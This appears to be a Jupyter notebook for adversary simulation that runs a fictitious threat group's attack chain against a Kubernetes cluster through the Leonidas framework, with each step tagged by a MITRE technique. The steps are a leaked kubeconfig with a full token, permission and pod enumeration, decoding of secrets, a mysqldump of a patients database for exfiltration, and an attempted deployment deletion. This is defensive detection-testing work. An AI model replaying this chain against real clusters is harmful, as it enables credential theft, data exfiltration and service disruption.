# APT codename "OF815"

*Simulation playbook for the fictitious threat actor "OF815" targeting Kubernetes clusters.*

Attack Chain
1. [Initial Access - Leaked Kubeconfig](#1.-Initial-Access---Leaked-Kubeconfig)
2. [Discovery - List Own Permissions](#2.-Discovery---List-Own-Permissions)
3. [Discovery - Enumerate Pods](#3.-Discovery---Enumerate-Pods)
4. [Credential Access - List Secrets](#4.-Credential-Access---List-secrets)
5. [Execution - Exec Into Pod](#5.-Execution---Exec-Into-Pod)
6. [Impact - Remove Deployment](#6.-Impact---Delete-Deployment)

![attack-chain](../img/OF815.png)


## 1. Initial Access - Leaked Kubeconfig

```
MITRE ID: T1078.004 / MS-TA9003 
```

The threat group discvoered a leaked Kubeconfig file on the internet such as the one below, that included the URL of cluster as well as valid ServiceAccount token:

```yaml
kind: Config
apiVersion: v1
clusters:
- cluster:
    server: https://12.168.77.179:8443
  name: dharma
contexts:
- context:
  name: lamppost
  cluster: dharma
  namespace: dharma-prod
  user: lamppost-sa
users:
- name: lamppost-sa
  user:
    token: eyJhbGciOiJ...
current-context: lamppost
```

To simulate this access, we'll instantiate a Leonidas `KubeClient` providing the leaked token to impersonate: 

In [None]:
import os
import sys
module_path = os.path.abspath(os.path.join('..'))
if module_path not in sys.path:
    sys.path.append(module_path)
from lib import kubeclientlib

compromised_token = "eyJhbGciOiJSUzI1NiIsImtpZCI6IjJQNC1wOThvcTA0WXNtMFdmai1ocFRvYl81aWFVRFJBenFkTndVRFFCejgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkaGFybWEtcHJvZCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJsYW1wcG9zdC1zYS1zZWNyZXQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoibGFtcHBvc3Qtc2EiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIxYTU0NDQ2MS1lMGFmLTRlZmUtODNiYS0wZDA2NDA4YzJmMjciLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGhhcm1hLXByb2Q6bGFtcHBvc3Qtc2EifQ.gW4er21RBDVJ0jUkgp7nEWNFwqGcvCLUT5p9Hk0z9I042ToOcN6CMn7ZR1FJ-XBnTwoaAQ2d0QdYNB3ZOXqcFZDQuqL1zPfa9DnjNFUY-VkqaEwhyXDf4I-e04ypGYM5Utj1nDxkc0KcBfMEk7XldgEE9q37TUcyLtAWVCDcU07QgRdb_P1ZsBbYSmca7NVL5QrZ-fI9aq2S2WbzwibqwyJEmMAgoaIcJCV8mgfhr_CdfMMSz36QgYP6k_cxuBYO4lRx__b5Qh2F1ftFqsBOaePHQK7acSN5Ly5cYvD1lCaJlH-LdX5pxwLfkoJnxuArlYtnw0PI3K4wz6diMG3M6w"
client = kubeclientlib.Client("http://127.0.0.1:5000/", compromised_token)

## 2. Discovery - List Own Permissions

```
MITRE ID: T1069.003, T1087.004
```

Once inside the cluster, the attacker enumerated the RBAC permissions assigned to the compromised serviceaccount

In [None]:
perms = client.run_case("discovery/list_own_permissions")
print(perms["stdout"])

## 3. Discovery - Enumerate Pods

```
MITRE ID: T1580, T1613
```

Observing the CRUD premissions over pods, the attacker lists the current workloads within the namespace

In [None]:
pods = client.run_case("discovery/enumerate_pods")
print(pods["stdout"])

import re
matches = re.finditer(r"\n([a-zA-Z0-9\-]+)", pods["stdout"], re.MULTILINE)
pods = [m.group().strip() for m in matches] 

## 4. Credential Access - List secrets 

Since the serviceaccount also had premissions to list Secrets within that namespace, the attacker proceeds to query the API server for Secrets...

In [None]:
secrets = client.run_case("credential_access/access_secrets_from_api_server")
# print(secrets["stdout"])

...which after some processing, include what appears to be  application credentials:

In [None]:
import json
import base64
js = json.loads(secrets["stdout"])
for i in js["items"]:
    print("\nSecret: " + i["metadata"]["name"])
    for k,v in i["data"].items():
        data = base64.b64decode(v).decode('utf-8')
        data = (data[:25] + '...') if len(data) > 25 else data
        print("\t%10s:%s" % (k,data))


## 5. Execution - Exec Into Pod

```
MITRE ID: T1609
```

Using the credentials obtained the attacker executes a command within a pod to create a DB dump for data exfiltration

In [None]:
# pods = ['hvac-controller', 'leonidas-deployment-848d4fccf-g9pbx', 'patient-db']
password = data
args = {
    "podname":pods[2],
    "command":"mysqldump --password="+password+" patients"
}
execout = client.run_case("execution/exec_into_container", args)
print(execout["stdout"])

## 6. Impact - Delete Deployment

```
MITRE ID: T1498
```

Finally, the attacker abuses their access to cause disruption, by attempting to remove a seemingly critical deployment. However this attempt fails as they do not have sufficient permissions

In [None]:
# pods = ['hvac-controller', 'leonidas-deployment-848d4fccf-g9pbx', 'patient-db']
args = {"deploymentname":"hvac-controller"}
delete = client.run_case("impact/delete_deployment", args)
print(delete["stdout"])
print(delete["stderr"])

## Execution Summary

In [None]:
import pandas 
pandas.DataFrame(client.execution_log).rename(index={0: "Test Case", 1: "Succeeded"}).transpose()